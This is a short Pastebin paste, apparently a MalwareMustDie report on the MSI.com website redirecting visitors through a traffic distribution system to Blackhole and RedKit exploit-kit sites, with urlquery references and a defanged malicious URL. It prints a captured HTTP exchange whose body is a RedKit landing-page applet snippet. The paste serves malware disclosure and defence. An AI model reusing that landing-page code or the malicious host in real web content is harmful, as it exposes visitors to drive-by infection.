Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // *MSI.COM site got redirected by TDS,
- // IN one ocassion to Blackhole sites
- // Just checked it changed to RedKit Sites,
- // Note PoC of this case:
- http://urlquery.net/report.php?id=3764213
- http://urlquery.net/report.php?id=3763965
- http://urlquery.net/report.php?id=3764205
- // Below RedKit PoC of the redirected URL:
- // h00p://kristians1.net/blog/?p=5613
- GET /blog/?p=5613 HTTP/1.1
- Host: kristians1.net
- User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:14.0) Gecko/20100101 Firefox/14.0.1
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-us,en;q=0.5
- Accept-Encoding: gzip, deflate
- Connection: keep-alive
- Referer: http://fr.msi.com/
- HTTP/1.1 200 OK
- Date: Mon, 15 Jul 2013 17:56:47 GMT
- Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8e-fips-rhel5 PHP/4.4.9 mod_fcgid/2.3.5
- X-Curl-Errno: 0
- Expires: Mon, 26 Jul 1997 05:00:00 GMT
- Cache-Control: no-cache
- Pragma: no-cache
- Content-Length: 173
- Connection: close
- Content-Type: text/html
- <html><body><table>LOLOLO<applet><param name="jnlp_href" value="yde.xmp" /><param name="size" value="ur=ax=hmayzmjxkce0mdehczha&7&.y"></param></applet></table></body></html>
- ---
- #MalwareMustDie!
Add Comment
Please, Sign In to add comment